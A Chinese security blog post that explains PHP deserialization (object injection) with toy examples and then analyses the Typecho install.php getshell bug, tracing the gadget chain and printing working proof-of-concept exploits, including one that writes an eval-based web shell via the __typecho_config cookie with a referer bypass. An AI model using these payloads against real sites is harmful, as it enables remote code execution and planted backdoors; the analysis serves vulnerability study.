<!DOCTYPE html>
<html>
  <head><meta name="generator" content="Hexo 3.9.0">
  <meta http-equiv="content-type" content="text/html; charset=utf-8">
  <meta content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0" name="viewport">
  <meta name="description" content="关注网络安全">
  <meta name="keyword" content="web安全 代码审计">
  
    <link rel="shortcut icon" href="/css/images/logo.png">
  
  <title>
    
      由Typecho深入理解PHP反序列化漏洞 | 影风博客
    
  </title>
  <link href="//cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.css" rel="stylesheet">
  <link href="//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/tomorrow.min.css" rel="stylesheet">
  <link rel="stylesheet" href="/css/style.css">
  
  <script src="//cdnjs.cloudflare.com/ajax/libs/jquery/3.2.1/jquery.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/geopattern/1.2.3/js/geopattern.min.js"></script>
  <script src="//cdnjs.cloudflare.com/ajax/libs/nprogress/0.2.0/nprogress.min.js"></script>
  
    <script src="/js/qrious.js"></script>
  
  
  
  
    <!-- MathJax support START -->
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script type="text/javascript" src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.5/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    <!-- MathJax support END -->
  


</head>
<div class="wechat-share">
  <img src="/css/images/logo.png">
</div>

  <body>
    <header class="header fixed-header">
  <div class="header-container">
    <a class="home-link" href="/">
      <div class="logo"></div>
      <span>影风博客</span>
    </a>
    <ul class="right-list">
      
        <li class="list-item">
          
            <a href="/" class="item-link">主页</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/tags/" class="item-link">标签</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/archives/" class="item-link">归档</a>
          
        </li>
      
        <li class="list-item">
          
            <a href="/about/" class="item-link">关于</a>
          
        </li>
      
    </ul>
    <div class="menu">
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
      <span class="icon-bar"></span>
    </div>
    <div class="menu-mask">
      <ul class="menu-list">
        
          <li class="menu-item">
            
              <a href="/" class="menu-link">主页</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/tags/" class="menu-link">标签</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/archives/" class="menu-link">归档</a>
            
          </li>
        
          <li class="menu-item">
            
              <a href="/about/" class="menu-link">关于</a>
            
          </li>
        
      </ul>
    </div>
  </div>
</header>

    <div id="article-banner">
  <h2>由Typecho深入理解PHP反序列化漏洞</h2>
  <p class="post-date">2019-07-27</p>
  <div class="arrow-down">
    <a href="javascript:;"></a>
  </div>
</div>
<main class="app-body flex-box">
  <!-- Article START -->
  <article class="post-article">
    <section class="markdown-content"><h2 id="0x00-前言"><a href="#0x00-前言" class="headerlink" title="0x00 前言"></a>0x00 前言</h2><p><code>Typecho</code>是一个轻量版的博客系统，前几天爆出<code>getshell</code>漏洞，网上也已经有相关的漏洞分析发布。这个漏洞是由<code>PHP</code>反序列化漏洞造成的，所以这里我们分析一下这个漏洞，并借此漏洞深入理解<code>PHP</code>反序列化漏洞。</p>
<h2 id="0x01-PHP反序列化漏洞"><a href="#0x01-PHP反序列化漏洞" class="headerlink" title="0x01 PHP反序列化漏洞"></a>0x01 PHP反序列化漏洞</h2><h3 id="漏洞简介"><a href="#漏洞简介" class="headerlink" title="漏洞简介"></a>漏洞简介</h3><p><code>PHP</code>反序列化漏洞也叫<code>PHP</code>对象注入，是一个非常常见的漏洞，这种类型的漏洞虽然有些难以利用，但一旦利用成功就会造成非常危险的后果。漏洞的形成的根本原因是程序没有对用户输入的反序列化字符串进行检测，导致反序列化过程可以被恶意控制，进而造成代码执行、<code>getshell</code>等一系列不可控的后果。反序列化漏洞并不是<code>PHP</code>特有，也存在于<code>Java</code>、<code>Python</code>等语言之中，但其原理基本相通。</p>
<h3 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h3><p>接下来我们通过几个实例来理解什么是<code>PHP</code>序列化与反序列化以及漏洞形成的具体过程，首先建立<code>1.php</code>文件文件内容如下：</p>
<pre><code class="php">&lt;?php
class TestClass
{
    //一个变量
    public $variable = &#39;This is a string&#39;;
    //一个简单的方法
    public function PrintVariable()
    {
        echo $this-&gt;variable;
    }
}
//创建一个对象
$object = new TestClass();
//调用一个方法
$object-&gt;PrintVariable();
?&gt;</code></pre>
<p>文件中有一个<code>TestClass</code>类，类中定义了一个<code>$variable</code>变量和一个<code>PrintVariable</code>函数，然后实例化这个类并调用它的方法，运行结果如下：</p>
<p><img src="http://pic.storysec.com/2019/typecho/1php.jpg" alt></p>
<p>这是一个正常的类的实例化和成员函数调用过程，但是有一些特殊的类成员函数在某些特定情况下会自动调用，称之为<code>magic</code>函数，<code>magic</code>函数命名是以符号<code>__</code>开头的，比如:<br><code>__construct</code>当一个对象创建时被调用，<br><code>__destruct</code>当一个对象销毁时被调用，<br><code>__toString</code>当一个对象被当作一个字符串被调用。</p>
<p>为了更好的理解<code>magic</code>方法是如何工作的，在<code>2.php</code>中增加了三个<code>magic</code>方法：<code>__construct</code>, <code>__destruct</code>和<code>__toString</code>。</p>
<pre><code class="php">&lt;?php
class TestClass
{
    //一个变量
    public $variable = &#39;This is a string&#39;;
    //一个简单的方法
    public function PrintVariable()
    {
        echo $this-&gt;variable;
    }
    public function __construct(){
        echo &#39;__construct&lt;br /&gt;&#39;;
    }
    public function __destruct(){
        echo &#39;__destruct&lt;br /&gt;&#39;;
    }
    public function __toString(){
        return &#39;__toString&lt;br /&gt;&#39;;
    }
}
//创建一个对象时 __construct会被调用
$object = new TestClass();
//调用一个方法
$object-&gt;PrintVariable();
//对象被当作一个字符串时，__toString会被调用
echo $object;
//脚本结束__destruct会被调用
?&gt;</code></pre>
<p>运行结果如下，注意还有其他的<code>magic</code>方法，这里只列举了几个。</p>
<p><img src="http://pic.storysec.com/2019/typecho/2php.jpg" alt></p>
<p><code>php</code>允许保存一个对象方便以后重用，这个过程被称为序列化。<br>为什么要有序列化这种机制呢?因为在传递变量的过程中，有可能遇到变量值要跨脚本文件传递的过程。<br>试想，如果在一个脚本中想要调用之前一个脚本的变量，但是前一个脚本已经执行完毕，所有的变量和内容释放掉了，我们要如何操作呢?难道要前一个脚本不断的循环，等待后面脚本调用?这肯定是不现实的。<br><code>serialize</code>和<code>unserialize</code>就是用来解决这一问题的。<code>serialize</code>可以将变量转换为字符串并且在转换中可以保存当前变量的值；<code>unserialize</code>则可以将<code>serialize</code>生成的字符串变换回变量。</p>
<p>让我们在<code>3.php</code>中添加序列化的例子，看看<code>php</code>对象序列化之后的格式。</p>
<pre><code class="php">&lt;?php
//某类
class User
{
    //类数据
    public $age =0;
    public $name =&#39;&#39;;
    //输出数据
    public function PrintData()
    {
        echo &#39;User &#39;.$this-&gt;name.&#39; is &#39;.$this-&gt;age.&#39;years old.&lt;br /&gt;&#39;;
    }
}
//创建一个对象
$usr = new User();

//设置数据
$usr-&gt;age =20;
$usr-&gt;name =&#39;John&#39;;
//输出数据
$usr-&gt;PrintData();
//输出序列化之后的数据
echo serialize($usr);
?&gt;</code></pre>
<p>输出如下:</p>
<p><img src="http://pic.storysec.com/2019/typecho/3php.jpg" alt></p>
<pre><code>O表示对象，
4表示对象名长度为4
&quot;User&quot;为类名
2表示成员变量个数
大括号里分别为变量的类型、长度、名称及其值</code></pre><p>想要将这个字符串恢复成类对象需要使用<code>unserialize</code>重建对象，在<code>4.php</code>中写入如下代码:</p>
<pre><code class="php">&lt;?php
//某类
class User
{
    //类数据
    public $age =0;
    public $name =&#39;&#39;;
    //输出数据
    public function PrintData()
    {
        echo &#39;User &#39;.$this-&gt;name.&#39; is &#39;.$this-&gt;age.&#39;years old.&lt;br /&gt;&#39;;
    }
}
//重建对象
$usr = unserialize(&#39;O:4:&quot;User&quot;:2:{s:3:&quot;age&quot;;i:20;s:4:&quot;name&quot;;s:4:&quot;John&quot;;}&#39;);
//调用PrintData输出数据
$usr-&gt;PrintData();
?&gt;</code></pre>
<p>运行结果：</p>
<p><img src="http://pic.storysec.com/2019/typecho/4php.jpg" alt></p>
<p>常见<code>magic</code>函数：</p>
<pre><code>__construct和__destruct会在对象创建或者销毁时自动调用

__sleep方法在一个对象被序列化的时候调用

__wakeup方法在一个对象被反序列化的时候调用</code></pre><p>在<code>5.php</code>中添加这几个<code>magic</code>函数的例子:</p>
<pre><code class="php">&lt;?php
class Test
{
    public $variable = &#39;BUZZ&#39;;
    public $variable2 = &#39;OTHER&#39;;
    public function PrintVariable()
    {
        echo $this-&gt;variable.&#39;&lt;br /&gt;&#39;;
    }
    public function __construct(){
        echo &#39;__construct&lt;br /&gt;&#39;;
    }
    public function __destruct(){
        echo &#39;__destruct&lt;br /&gt;&#39;;
    }
    public function __wakeup(){
        echo &#39;__wakeup&lt;br /&gt;&#39;;
    }
    public function __sleep(){
        echo &#39;__sleep&lt;br /&gt;&#39;;
        return array(&#39;variable&#39;,&#39;variable2&#39;);
    }
}
//创建一个对象时 __construct会被调用
$obj = new Test();
//序列化对象调用__sleep
$serialized = serialize($obj);
//输出序列化后的字符串
print &#39;Serialized: &#39; . $serialized .&#39;&lt;br /&gt;&#39;;
//重建对象调用__wakeup
$obj2 = unserialize($serialized);
//调用PrintVariable输出数据
$obj2-&gt;PrintVariable();
//脚本结束调用__destruct
?&gt;</code></pre>
<p>运行结果:</p>
<p><img src="http://pic.storysec.com/2019/typecho/5php.jpg" alt></p>
<p><code>OK</code>，到此我们已经知道了<code>magic</code>函数、序列化与反序列化这几个重要概念，那么这个过程漏洞是怎么产生的呢？我们再来看一个例子<code>6.php</code></p>
<pre><code class="php">&lt;?php
class example{
    public $handle;
    function __destruct(){
        $this-&gt;shutdown();
    }
    public function shutdown(){
        $this-&gt;handle-&gt;close();
    }
}
class process{
    public $pid;
    function close(){
        eval($this-&gt;pid);
    }
}
if(isset($_GET[&#39;data&#39;])){
    $user_data = unserialize(urldecode($_GET[&#39;data&#39;]));
}
?&gt;</code></pre>
<p>这段代码包含两个类，一个<code>example</code>和一个<code>process</code>。<br>在<code>process</code>中有一个成员函数<code>close()</code>,其中有一个<code>eval()</code>函数，但是其参数不可控，我们无法利用它执行任意代码。<br>但是在<code>example</code>类中有一个<code>__destruct()</code>析构函数，它会在脚本调用结束的时候执行，析构函数调用了本类中的一个成员函数<code>shutdown()</code>，其作用是调用某个地方的<code>close()</code>函数。<br>于是开始思考这样一个问题：能否让他去调用<code>process</code>中的<code>close()</code>函数且<code>$pid</code>变量可控呢？<br>答案是可以的，只要在反序列化的时候<code>$handle</code>是<code>process</code>的一个类对象，<code>$pid</code>是想要执行的任意代码代码即可，看一下如何构造<code>POC</code></p>
<pre><code class="php">&lt;?php
class example{
    public $handle;
    function __construct(){
        $this-&gt;handle = new process();
    }
}
class process{
    public $pid;
    function __construct(){
        $this-&gt;pid =&#39;phpinfo();&#39;;
    }
}
$test = new example();
echo urldecode(serialize($test));
?&gt;</code></pre>
<p>生成序列化后的字符串：</p>
<pre><code>O:7:&quot;example&quot;:1:{s:6:&quot;handle&quot;;O:7:&quot;process&quot;:1:{s:3:&quot;pid&quot;;s:10:&quot;phpinfo();&quot;;}}</code></pre><p><code>payload</code>：</p>
<pre><code>http://127.0.0.1/test/6.php?data=O:7:&quot;example&quot;:1:{s:6:&quot;handle&quot;;O:7:&quot;process&quot;:1:{s:3:&quot;pid&quot;;s:10:&quot;phpinfo();&quot;;}}</code></pre><p>执行效果：</p>
<p><img src="http://pic.storysec.com/2019/typecho/poc.jpg" alt></p>
<p>当我们序列化的字符串进行反序列化时,就会按照我们的设定生成一个<code>example</code>类对象，当脚本结束时自动调用<code>__destruct()</code>函数，然后调用<code>shutdown()</code>函数，此时<code>$handle</code>为<code>process</code>的类对象，所以接下来会调用<code>process</code>的<code>close()</code>函数，<code>eval()</code>就会执行，而<code>$pid</code>也可以进行设置，此时就造成了代码执行。</p>
<p>这整个攻击线路我们称之为<code>ROP</code>（<code>Return-oriented programming</code>）链，其核心思想是在整个进程空间内现存的函数中寻找适合代码片断（<code>gadget</code>），并通过精心设计返回代码把各个<code>gadget</code>拼接起来，从而达到恶意攻击的目的。</p>
<p>构造<code>ROP</code>攻击的难点在于，我们需要在整个进程空间中搜索我们需要的<code>gadgets</code>，这需要花费相当长的时间。</p>
<p>但一旦完成了”搜索”和”拼接”，这样的攻击是无法抵挡的，因为它用到的都是程序中合法的的代码，普通的防护手段难以检测。</p>
<p>反序列化漏洞需要满足两个条件：</p>
<pre><code>1、程序中存在序列化字符串的输入点
2、程序中存在可以利用的magic函数</code></pre><p>接下来通过<code>Typecho</code>的序列化漏洞进行实战分析。</p>
<h2 id="0x02-Typecho漏洞分析"><a href="#0x02-Typecho漏洞分析" class="headerlink" title="0x02 Typecho漏洞分析"></a>0x02 Typecho漏洞分析</h2><p>漏洞的位置发生在<code>install.php</code>，首先有一个<code>referer</code>的检测，使其值为一个站内的地址即可绕过。</p>
<pre><code class="php">// 挡掉可能的跨站请求
if (!empty($_GET) || !empty($_POST)) {
    if (empty($_SERVER[&#39;HTTP_REFERER&#39;])) {
        exit;
    }

    $parts = parse_url($_SERVER[&#39;HTTP_REFERER&#39;]);
    if (!empty($parts[&#39;port&#39;])) {
        $parts[&#39;host&#39;] = &quot;{$parts[&#39;host&#39;]}:{$parts[&#39;port&#39;]}&quot;;
    }

    if (empty($parts[&#39;host&#39;]) || $_SERVER[&#39;HTTP_HOST&#39;] != $parts[&#39;host&#39;]) {
        exit;
    }
}</code></pre>
<p>入口点在<code>232</code>行:</p>
<pre><code class="php">&lt;?php
$config = unserialize(base64_decode(Typecho_Cookie::get(&#39;__typecho_config&#39;)));
Typecho_Cookie::delete(&#39;__typecho_config&#39;);
$db = new Typecho_Db($config[&#39;adapter&#39;], $config[&#39;prefix&#39;]);
$db-&gt;addServer($config, Typecho_Db::READ | Typecho_Db::WRITE);
Typecho_Db::set($db);
?&gt;</code></pre>
<p>这里将<code>cookie</code>中的<code>__typecho_config</code>值取出，然后<code>base64</code>解码再进行反序列化，这就满足了漏洞发生的第一个条件：存在序列化字符串的输入点。</p>
<p>接下来就是去找一下有什么<code>magic</code>方法可以利用。先全局搜索<code>__destruct()</code>和<code>__wakeup()</code>:</p>
<p><img src="http://pic.storysec.com/2019/typecho/destruct.jpg" alt></p>
<p>找到两处<code>__destruct()</code>，跟进去没有可利用的地方，跟着代码往下走会实例化一个<code>Typecho_Db</code>，位于<code>var\Typecho\Db.php</code>，<code>Typecho_Db</code>的构造函数如下:</p>
<pre><code class="php">public function __construct($adapterName, $prefix = &#39;typecho_&#39;)
{
    /** 获取适配器名称 */
    $this-&gt;_adapterName = $adapterName;

    /** 数据库适配器 */
    $adapterName = &#39;Typecho_Db_Adapter_&#39; . $adapterName;

    if (!call_user_func(array($adapterName, &#39;isAvailable&#39;))) {
        throw new Typecho_Db_Exception(&quot;Adapter {$adapterName} is not available&quot;);
    }

    $this-&gt;_prefix = $prefix;

    /** 初始化内部变量 */
    $this-&gt;_pool = array();
    $this-&gt;_connectedPool = array();
    $this-&gt;_config = array();

    //实例化适配器对象
    $this-&gt;_adapter = new $adapterName();
}</code></pre>
<p>在第<code>120</code>行使用<code>.</code>运算符连接<code>$adapterName</code>，这时<code>$adapterName</code>如果是一个实例化的对象就会自动调用<code>__toString</code>方法（如果存在的话），那全局搜索一下<code>__toString()</code>方法。找到3处:</p>
<p><img src="http://pic.storysec.com/2019/typecho/toString.jpg" alt></p>
<p>前两处无法利用，跟进第三处，<code>__toString()</code>在<code>var\Typecho\Feed.php</code> 223行</p>
<p>跟进代码在290处有如下代码</p>
<pre><code class="php">$content .= &#39;&lt;dc:creator&gt;&#39; . htmlspecialchars($item[&#39;author&#39;]-&gt;screenName) . &#39;&lt;/dc:creator&gt;&#39; . self::EOL;</code></pre>
<p>如何<code>$item[&#39;author&#39;]</code>是一个类而<code>screenName</code>是一个无法被直接调用的变量（私有变量或根本就不存在的变量），则会自动调用<code>__get()</code> <code>magic</code>方法，进而再去寻找可以利用的<code>__get()</code>方法，全局搜索:</p>
<p><img src="http://pic.storysec.com/2019/typecho/magic_get.jpg" alt></p>
<p>共匹配到10处，其中在<code>var\Typecho\Request.php</code>中的代码可以利用，跟进:</p>
<pre><code class="php">public function __get($key)
{
    return $this-&gt;get($key);
}</code></pre>
<p>再跟进到<code>get</code>函数:</p>
<pre><code class="php">public function get($key, $default = NULL)
{
    switch (true) {
        case isset($this-&gt;_params[$key]):
            $value = $this-&gt;_params[$key];
            break;
        case isset(self::$_httpParams[$key]):
            $value = self::$_httpParams[$key];
            break;
        default:
            $value = $default;
            break;
    }

    $value = !is_array($value) &amp;&amp; strlen($value) &gt; 0 ? $value : $default;
    return $this-&gt;_applyFilter($value);
}</code></pre>
<p>接着进入<code>_applyFilter</code>函数:</p>
<pre><code class="php">private function _applyFilter($value)
{
    if ($this-&gt;_filter) {
        foreach ($this-&gt;_filter as $filter) {
            $value = is_array($value) ? array_map($filter, $value) :
            call_user_func($filter, $value);
        }

        $this-&gt;_filter = array();
    }

    return $value;
}</code></pre>
<p>可以看到<code>array_map</code>和<code>call_user_func</code>函数，他们都可以动态的执行函数，第一个参数表示要执行的函数的名称，第二个参数表示要执行的函数的参数。</p>
<p>我们可以在这里尝试执行任意代码。接下来梳理一下整个流程，数据的输入点在<code>install.php</code>文件的232行，从外部读入序列化的数据。</p>
<p>然后根据我们构造的数据，程序会进入<code>Db.php</code>的<code>__construct()</code>函数，然后进入<code>Feed.php</code>的<code>__toString()</code>函数，再依次进入<code>Request.php</code>的<code>__get()</code>、<code>get()</code>、<code>_applyFilter()</code>函数，最后由<code>call_user_func</code>实现任意代码执行，整个<code>ROP</code>链形成。构造<code>POC</code>如下:</p>
<pre><code class="php">&lt;?php
class Typecho_Request
{
    private $_filter = array();
    private $_params = array();

    public function __construct(){
        $this-&gt;_filter[0] = &#39;phpinfo&#39;;
        $this-&gt;_params[&#39;screenName&#39;] =-1;
    }
}
class Typecho_Feed
{
    private $_type = &#39;ATOM 1.0&#39;;
    private $_charset = &#39;UTF-8&#39;;
    private $_lang = &#39;zh&#39;;
    private $_items = array();

    public function __construct(){
        $_items[&#39;author&#39;] = new Typecho_Request();
        $_items[&#39;category&#39;] = array(new Typecho_Request());
        $this-&gt;_items[0] = $items;
    }
}
$exp = array(
    &#39;adapter&#39; =&gt; new Typecho_Feed(),
    &#39;prefix&#39; =&gt; &#39;typecho&#39;);
echo base64_encode(serialize($exp));
?&gt;</code></pre>
<p><code>POC</code>的22行<code>$_items[&#39;category&#39;] = array(new Typecho_Request());</code><br>其实与反序列化无关，但是不加这一行程序就不会有回显，因为在<code>install.php</code>的开头部分调用了程序调用了<code>ob_start()</code>，它会开启缓冲区并将要输出的内容都放进缓冲区，想要使用的时候可以再取出。但是我们的对象注入会在后续的代码中造成数据库错误</p>
<p><img src="http://pic.storysec.com/2019/typecho/databaseerror.jpg" alt><br><img src="http://pic.storysec.com/2019/typecho/500.jpg" alt></p>
<p>然后会触发<code>exception</code>，其中的<code>ob_end_clean()</code>会将缓冲区中的内容清空，导致无法回显。</p>
<pre><code class="php">public static function exceptionHandle($exception)
{
    if (defined(&#39;__TYPECHO_DEBUG__&#39;)) {
        echo &#39;&lt;pre&gt;&lt;code&gt;&#39;;
        echo &#39;&lt;h1&gt;&#39; . htmlspecialchars($exception-&gt;getMessage()) . &#39;&lt;/h1&gt;&#39;;
        echo htmlspecialchars($exception-&gt;__toString());
        echo &#39;&lt;/code&gt;&lt;/pre&gt;&#39;;
    } else {
        @ob_end_clean();
        if (404 == $exception-&gt;getCode() &amp;&amp; !empty(self::$exceptionHandle)) {
            $handleClass = self::$exceptionHandle;
            new $handleClass($exception);
        } else {
            self::error($exception);
        }
    }

    exit;
}</code></pre>
<p>想要解决这个问题需要在<code>ob_end_clean()</code>执行之前是程序退出，两种方法：</p>
<pre><code>1、使程序跳转到存在exit()的代码段
2、使程序提前报错，退出代码</code></pre><p><code>POC</code>中使用的是第二种方法</p>
<p><img src="http://pic.storysec.com/2019/typecho/categoryerror.jpg" alt></p>
<p>解决了上述问题后就可以执行任意代码并能看到回显了，执行的时候在<code>http</code>头添加<code>referer</code>使其等于一个站内地址，然后在<code>cookie</code>中添加字段<code>__typecho_config</code>，其值为上述<code>exp</code>的输出。</p>
<p>有些利用方式并不需要回显，比如写个<code>shell</code>什么的，<code>POC</code>如下:</p>
<pre><code class="php">&lt;?php
class Typecho_Request
{
    private $_filter = array();
    private $_params = array();

    public function __construct(){
        $this-&gt;_filter[0] = &#39;assert&#39;;
        $this-&gt;_params[&#39;screenName&#39;] = &#39;fputs(fopen(\&#39;./shell.php\&#39;,\&#39;w\&#39;),\&#39;&lt;?php @eval($_POST[a]);?&gt;\&#39;)&#39;;
    }
}
class Typecho_Feed
{
    private $_type = &#39;RSS 2.0&#39;;
    private $_charset = &#39;UTF-8&#39;;
    private $_lang = &#39;zh&#39;;
    private $_items = array();

    public function __construct(){
        $_items[&#39;author&#39;] = new Typecho_Request();
        $this-&gt;_items[0] = $_items;
    }
}
$exp = array(&#39;adapter&#39; =&gt; new Typecho_Feed(),&#39;prefix&#39; =&gt; &#39;typecho&#39;);
echo base64_encode(serialize($exp));
?&gt;</code></pre>
<p>执行结果，在根目录生成<code>shell.php</code></p>
<p><img src="http://pic.storysec.com/2019/typecho/shell.jpg" alt></p>
</section>
    <!-- Tags START -->
    
      <div class="tags">
        <span>Tags:</span>
        
  <a href="/tags#PHP反序列漏洞" >
    <span class="tag-code">PHP反序列漏洞</span>
  </a>

  <a href="/tags#代码审计" >
    <span class="tag-code">代码审计</span>
  </a>

  <a href="/tags#typecho漏洞利用" >
    <span class="tag-code">typecho漏洞利用</span>
  </a>

      </div>
    
    <!-- Tags END -->
    <!-- NAV START -->
    
  <div class="nav-container">
    <!-- reverse left and right to put prev and next in a more logic postition -->
    
      <a class="nav-left" href="/2019/07/27/测试文章/">
        <span class="nav-arrow">← </span>
        
          测试文章
        
      </a>
    
    
  </div>

    <!-- NAV END -->
    <!-- 打赏 START -->
    
      <div class="money-like">
        <div class="reward-btn">
          赏
          <span class="money-code">
            <span class="alipay-code">
              <div class="code-image"></div>
              <b>使用支付宝打赏</b>
            </span>
            <span class="wechat-code">
              <div class="code-image"></div>
              <b>使用微信打赏</b>
            </span>
          </span>
        </div>
        <p class="notice">若你觉得我的文章对你有帮助，欢迎点击上方按钮对我打赏</p>
      </div>
    
    <!-- 打赏 END -->
    <!-- 二维码 START -->
    
      <div class="qrcode">
        <canvas id="share-qrcode"></canvas>
        <p class="notice">扫描二维码，分享此文章</p>
      </div>
    
    <!-- 二维码 END -->
    
      <!-- No Comment -->
    
  </article>
  <!-- Article END -->
  <!-- Catalog START -->
  
    <aside class="catalog-container">
  <div class="toc-main">
    <strong class="toc-title">Catalog</strong>
    
      <ol class="toc-nav"><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x00-前言"><span class="toc-nav-text">0x00 前言</span></a></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x01-PHP反序列化漏洞"><span class="toc-nav-text">0x01 PHP反序列化漏洞</span></a><ol class="toc-nav-child"><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#漏洞简介"><span class="toc-nav-text">漏洞简介</span></a></li><li class="toc-nav-item toc-nav-level-3"><a class="toc-nav-link" href="#漏洞原理"><span class="toc-nav-text">漏洞原理</span></a></li></ol></li><li class="toc-nav-item toc-nav-level-2"><a class="toc-nav-link" href="#0x02-Typecho漏洞分析"><span class="toc-nav-text">0x02 Typecho漏洞分析</span></a></li></ol>
    
  </div>
</aside>
  
  <!-- Catalog END -->
</main>

<script>
  (function () {
    var url = 'https://storysec.github.io/2019/07/27/由Typecho深入理解PHP反序列化漏洞/';
    var banner = ''
    if (banner !== '' && banner !== 'undefined' && banner !== 'null') {
      $('#article-banner').css({
        'background-image': 'url(' + banner + ')'
      })
    } else {
      $('#article-banner').geopattern(url)
    }
    $('.header').removeClass('fixed-header')

    // error image
    $(".markdown-content img").on('error', function() {
      $(this).attr('src', 'http://file.muyutech.com/error-img.png')
      $(this).css({
        'cursor': 'default'
      })
    })

    // zoom image
    $(".markdown-content img").on('click', function() {
      var src = $(this).attr('src')
      if (src !== 'http://file.muyutech.com/error-img.png') {
        var imageW = $(this).width()
        var imageH = $(this).height()

        var zoom = ($(window).width() * 0.95 / imageW).toFixed(2)
        zoom = zoom < 1 ? 1 : zoom
        zoom = zoom > 2 ? 2 : zoom
        var transY = (($(window).height() - imageH) / 2).toFixed(2)

        $('body').append('<div class="image-view-wrap"><div class="image-view-inner"><img src="'+ src +'" /></div></div>')
        $('.image-view-wrap').addClass('wrap-active')
        $('.image-view-wrap img').css({
          'width': `${imageW}`,
          'transform': `translate3d(0, ${transY}px, 0) scale3d(${zoom}, ${zoom}, 1)`
        })
        $('html').css('overflow', 'hidden')

        $('.image-view-wrap').on('click', function() {
          $(this).remove()
          $('html').attr('style', '')
        })
      }
    })
  })();
</script>


  <script>
    var qr = new QRious({
      element: document.getElementById('share-qrcode'),
      value: document.location.href
    });
  </script>






    <div class="scroll-top">
  <span class="arrow-icon"></span>
</div>
    <footer class="app-footer">
  <p class="copyright">
    &copy; 2019 | Proudly powered by <a href="https://hexo.io" target="_blank">Hexo</a>
    <br>
    Theme by <a href="https://github.com/yanm1ng">yanm1ng</a>
  </p>
</footer>

<script>
  function async(u, c) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (c) { o.addEventListener('load', function (e) { c(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }
</script>
<script>
  async("//cdnjs.cloudflare.com/ajax/libs/fastclick/1.0.6/fastclick.min.js", function(){
    FastClick.attach(document.body);
  })
</script>

<script>
  var hasLine = 'true';
  async("//cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/highlight.min.js", function(){
    $('figure pre').each(function(i, block) {
      var figure = $(this).parents('figure');
      if (hasLine === 'false') {
        figure.find('.gutter').hide();
      }
      var lang = figure.attr('class').split(' ')[1] || 'code';
      var codeHtml = $(this).html();
      var codeTag = document.createElement('code');
      codeTag.className = lang;
      codeTag.innerHTML = codeHtml;
      $(this).attr('class', '').empty().html(codeTag);
      figure.attr('data-lang', lang.toUpperCase());
      hljs.highlightBlock(block);
    });
  })
</script>
<!-- Baidu Tongji -->

<script src="/js/script.js"></script>
  </body>
</html>